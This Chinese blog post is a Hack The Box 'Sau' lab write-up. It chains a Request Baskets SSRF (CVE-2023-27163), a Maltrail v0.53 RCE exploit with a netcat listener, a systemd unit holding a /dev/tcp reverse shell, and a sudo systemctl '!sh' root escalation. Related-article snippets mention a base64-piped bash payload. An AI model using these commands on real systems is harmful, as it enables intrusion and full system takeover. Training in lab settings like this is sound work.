HTB靶场-Sau

最新推荐文章于 2024-04-25 10:19:58 发布
最新推荐文章于 2024-04-25 10:19:58 发布
阅读量969 收藏 18
点赞数 21
分类专栏: 打靶 文章标签: 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yc11223344/article/details/135406779
版权
  • 本人自己的打靶记录,会有错误的地方,尽情谅解,欢迎指出错误和不解的地方,让我们共同进步!

在这里插入图片描述

信息收集

端口扫描

nmap -sV 10.10.11.224

在这里插入图片描述
22,80,55555端口开放,80端口访问不了,但是55555端口有web服务

在这里插入图片描述
通过页面显示 Request Baskets 1.2.1版本

  • Request Baskets是rbaskets开源的一个Web服务

在这里插入图片描述
搜索发现有一个SSRF漏洞(CVE-2023-27163)
在这里插入图片描述

Request Baskets SSRF漏洞利用

poc文章

  • request baskets服务存在api接口/api/baskets/{name},/baskets/{name},这里的name可以任意,这些接口会接收一个forward_url参数,而这个参数存在SSRF漏洞。
  • 向/api/baskets/{name}或者/baskets/{name}发送forward_url参数,只需访问x.x.x.x:xxx/{name}就可以造成SSRF
  • 这个靶场的思路就是把80端口的内容显示在55555端口的{name}目录下

使用以下有效负载来发送 /api/baskets/{name} API:

{
“forward_url”: “http://127.0.0.1:80”,
“proxy_response”: true,
“insecure_tls”: false,
“expand_path”: true,
“capacity”: 250
}

  • 注意:需要将proxy_response参数改为true

在这里插入图片描述
访问http://10.10.11.224:55555/hang0c即可看到80端口上的内容
在这里插入图片描述

Maltrail v0.53漏洞利用

在左下角发现Maltrail v0.53
在这里插入图片描述
搜索到一个rce的文章地址

在这里插入图片描述

  • 注意:这个漏洞是在登录页面触发的
    直接访问http://10.10.11.224:55555/hang0c/login发现是存在的,我们可以直接进行漏洞利用,也可以在用SSRF漏洞生成一个定向到login页面的url
    在这里插入图片描述

我们需要监听对应的端口,在进行执行脚本就可以rce了

nc -lnvp 1234

在这里插入图片描述

python3 exploit.py 10.10.14.27 1234 http://10.10.11.224:55555/hang0c

在这里插入图片描述
成功反弹shell
在这里插入图片描述
这个时候我们就可以得到user.txt的内容了
在这里插入图片描述

提权

sudo -l

在这里插入图片描述
使用systemctl提权,反弹root权限的shell

复现文章
首先进入到/dev/shm目录,创建文件mm.service

echo ‘[Service]
Type=oneshot
ExecStart=/bin/bash -c “/bin/bash -i > /dev/tcp/10.10.14.27/2345 0>&1 2<&1”
[Install]
WantedBy=multi-user.target’ > mm.service

在这里插入图片描述
检查一下mm.service中的内容
在这里插入图片描述
确认无误后,我们进入到交互shell

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

执行mm.service,启动服务

sudo systemctl link /dev/shm/mm.service

在这里插入图片描述
不是不需要用密码吗,为啥还用?
我们还回头看sudo -l输出的内容,限制了服务名称?

在这里插入图片描述
我们将服务名称改为trail.service还是需要输入密码

在GTFOBins查找systemctl提权方法
在这里插入图片描述
根据sudo -l的显示内容 我们直接执行

sudo systemctl status trail.service

在这里插入图片描述
执行一会他会停下来,我们直接输入!sh
在这里插入图片描述
成功提升到root权限,拿到flag
在这里插入图片描述

总结

  • 使用Request Baskets 的SSRF漏洞进行访问80端口的页面
  • Maltrail v0.53的RCE漏洞进行反弹shell
  • 使用systemctl进行提权
  • 由于靶场的网络不稳定所以有时候需要重新操作好几遍才能成功

参考文章

Request Baskets SSRF漏洞利用:https://notes.sjtu.edu.cn/s/MUUhEymt7

Maltrail RCE漏洞利用:https://github.com/spookier/Maltrail-v0.53-Exploit

systemctl提权:https://gtfobins.github.io/gtfobins/systemctl/#sudo

systemctl提权:https://www.cnblogs.com/zlgxzswjy/p/14781471.html

hang0c
关注
  • 21
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
HTB靶场 Shared
weixin_45682839的博客
08-22 2061
HTB靶场shared靶机通关攻略记录,涉及知识点包括:端口服务扫描、sql注入(cookie)、linux提权(ipython越权漏洞、redis逃逸漏洞)
HTB靶场系列 linux靶机 Beep靶机
m0_57221101的博客
01-15 1220
这个靶场真的很厉害,学到了非常多的东西 需要学习的技能 nmap扫描具体端口 -sC -sV -p 223 searchspoilt 打开文件 -x sslscan ip 探测目标机器 ssl版本 勘探 首先还是一样用nmap大致扫描,再用nmap对扫出的端口进行细致扫描 nmap nmapshows a bunch of ports open on the box: root@kali# nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10..
HTB靶场使用教程
鹧鸪的起点
07-25 1126
简单介绍下HTB注册教程
HTB靶场 Perfection
最新发布
m0_62438849的博客
04-25 784
其余恶意代码=echo+[payload]|+base64+-d+|+bash (+表示空格)总的 category1=%25>;写一段反弹shell代码#!经过base64编码。
HTB打靶(Active Directory 101 Mantis)
qq_18811919的博客
02-03 458
HTB打靶(Active Directory 101 Mantis)
HTB靶机-Postman Write Up
weixin_43815032的博客
12-27 1057
0x00 引子 某日在安全客上刷到了这个文章《我是如何拿到OSCP认证的?》,读完之后感觉太TM励志了,教练我也考OSCP,说干就干,于是随手搜索了一些备战OSCP的分享,看了一些准备知识,先从靶场练起。 0x01 准备工作 ...
HTB靶场系列 linux靶机 Node靶机
m0_57221101的博客
01-13 1725
勘探 nmap > nmap 10.10.10.58 Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 10:58 EDT Nmap scan report for 10.10.10.58 Host is up (0.31s latency). Not shown: 65533 filtered ports PORT STATE SERVICE 22/tcp open ssh 3000/tcp open ppp Nmap
T-HTB manager-开源
05-03
T-HTB免费网络界面,内置PHP,简单的Java脚本,Ajax,嵌套集模型MySQL,rrd图,使用iptables创建tc命令CLASSIFY
htb21-reg:htb 2021注册引擎
05-20
HTB 7注册门户 什么? 这是一个允许compsoc委员会成员使用我们现有的google admin平台登录内部应用程序的工具。 为什么? 这使我们可以极大地减少启动新应用程序的开销,因为我们可以将帐户管理移交给长期受苦的...
HTB[-tools] Config Generator-开源
05-06
HTB-tools配置生成器是一个脚本,可以使您的生活变得轻松。 您只需5分钟即可生成一个完整IP地址类别的配置文件。 您可以自定义任何内容,只需使用它即可:)
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1900
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
记一次对HTB靶场的渗透测试
MNK_xwf的博客
01-07 397
攻击地址:10.10.14.30 靶机地址:10.10.11.183 信息搜集阶段 利用nmap对靶机地址进行全端口扫描: 能看到目标地址开放了22,80,3000,3306端口,至于udp端口我也懒得扫,这种靶场没几个开放了的 用浏览器分别访问22,80,3000,3306端口结果只有3000端口开放,一看,是grafana系统 不过这个没怎么接触过,用searchsploit搜了一下 发现了一个任意文件读取漏洞刚好有对应的脚本我们直接下载 利用命令: python3 5058
网络安全靶场推荐,让你通过实操能快速提升实战技能!
Y525698136的博客
03-04 1216
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
HTB靶场-Codify
yc11223344的博客
01-05 922
通过node.js的沙箱逃逸漏洞进行gatshell在/var/www/contact下发现数据库文件,拿到用户名和密码ssh连接后取得普通用户的flag通过可执行文件进行提权,拿到root的密码。
网络安全靶场推荐,通过实操能快速提升实战技能!
Y525698136的博客
10-18 1661
自学网络安全知识,具备一定的理论基础,缺乏实战经验,想去网络靶场体验一下,通过实操能快速提升实战技能!
HTB靶场系列 linux靶机 靶机cronos
m0_57221101的博客
01-19 1709
勘探 基本操作先用nmap扫一下 nmap 10.10.10.13 Starting Nmap 7.80 (https://nmap.org) at 2020-04-07 21:01 EDT Nmap scan report for 10.10.10.13 Host is up (0.014s latency). Not shown: 65532 filtered ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain ..
htb靶场获取邀请码一步到位
luminous_you的博客
10-31 1759
参考大佬的博客 发现前面的步骤出现的东西都是一样的,如果有兴趣看怎末找注册码可以跳转https://cloud.tencent.com/developer/article/1512000 也可以直接命令行输入,生成注册码(省略找的环节) curl -XPOST https://www.hackthebox.eu//api/invite/generate S1RFQVEtWEZaVUItR0tTQUYtRU1XWlgtUVNKQlI= 编码转换 http://tool.chinaz.com/Tools/B
format htb
08-24
HTB is an abbreviation for Hack The Box, which is an online platform that provides hands-on penetration testing and hacking challenges. It allows users to simulate real-world cybersecurity scenarios and practice their skills in a safe and controlled environment. The format of HTB typically involves a series of machines or challenges that users need to exploit to gain root access or find flags. Participants can use various tools and techniques to solve the challenges and improve their knowledge of cybersecurity.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值